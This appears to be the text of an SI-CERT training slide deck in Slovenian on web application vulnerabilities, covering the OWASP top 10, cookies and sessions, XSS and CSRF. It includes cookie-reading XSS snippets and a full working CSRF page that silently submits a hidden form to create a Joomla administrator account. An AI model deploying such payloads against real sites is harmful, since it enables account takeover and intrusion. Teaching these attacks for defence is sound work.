Ranljivosti spletnih

aplikacij

Tadej Hren, SI-CERT(ARNES)

SPLETNA APLIKACIJA

RANLJIVA APLIKACIJA

Top 10

• Cross Site Scripting (XSS)

• Injection Flaws

• Malicious File Execution (RFI)

• Insecure Direct Object Reference

• Cross Site Request Forgery (CSRF)

• Information Leakage and Improper Error Handling

• Broken Authentication and Session Management

• Insecure Cryptographic Storage

• Insecure Communications

• Failure to Restrict URL Access

• ...

Kako deluje splet?

google.com

GET /index.html

HTTP/1.x 200 OK

<html><head><title>Google</title>...

<img src="/images/logo.png"/><input

type=submit value= "Iskanje

Google">...</html>

GET /images/logo.png

HTTP/1.x 200 OK

...........X.v.6...S.Z.j..O..Q.7q..6'M6...f.9

... .....s..z.O.....E.Iv....x...&..

`.....Mr=..INq2....(.....[F.......uI=

T."O.....!"9...........D3..........&J.._,

Bi kdo piškotek?

gmail.com

POST /accounts/Login?service=mail

Email=tadej.hren&Passwd=blabla

HTTP/1.x 200 OK

Set-Cookie: SID=DQA4V8lfg4dtusv

<html><head>...

GET /mail/sendmail?service=mail

Cookie: SID=DQA4V8lfg4dtusv

HTTP/1.x 200 OK

<html><head>...

user:tadej.hren

Cookie:DQA4V8…

…

Javascript

<script>document.cookie</script>

Javascript

<script>alert("Pomembno obvestilo!")</script>

Cross Site Scripting (XSS)

Izkorišča zaupanje uporabnika,

ki ga ima do spletne strani

XSS

DEMO

Cross Site Request Forgery

(CSRF)

Izkorišča zaupanje spletne strani,

ki ga ima do uporabnika

CSRF

SPLETNA STRAN BRSKALNIK UPORABNIK

Avtenticirana seja

X

DEJANJE

CSRF

DEMO

Slikca? <html><body>

<script type="text/javascript">

window.onload = function() {<html><body><script type="text/javascript">

window.onload = function() {

var url = "http://localhost/slojoomla/administrator/index2.php";

var gid = 25;

var user = 'ub3rh4cker';

var pass = 'password';

var email = 'ub3rh4cker@guest.arnes.si';

var param = {

name: user, username: user, email: email, password: pass,

password2: pass, gid: gid, block: 0, option: 'com_users',

task: 'save', sendEmail: 1

};

var form = document.createElement('form');

form.action = url; form.method = 'post';

form.target = 'hidden'; form.style.display = 'none';

for (var i in param) {

try {

// ie

var input = document.createElement('<input name="'+i+'">');

} catch(e) {

// other browsers

var input = document.createElement('input');

input.name = i;

}

input.setAttribute('value', param[i]);

form.appendChild(input);

}

document.body.appendChild(form);

form.submit();

}

</script>

<iframe name="hidden" style="display: none"></iframe>

<img src="clip.png"></body></html>

XSS+CSRF

Anica

Bine

Cene

Davor

Erika

Filip

Grega

Haso

Ivan

Ivan

Joži

Karmen

Luka

Mitja

Nina

Oma

Petra

Rado

Suljo

Šime

Tedi

Urbi

Vera

Zarja

Željko

RANLJIVA APLIKACIJA

RANLJIVA APLIKACIJA

Zaščita?

IE8

FF&NoScript

Vprašanja?

• http://www.cert.si

• http://www.arnes.si/si-cert

• http://www.twitter.com/sicert

• si-cert@arnes.si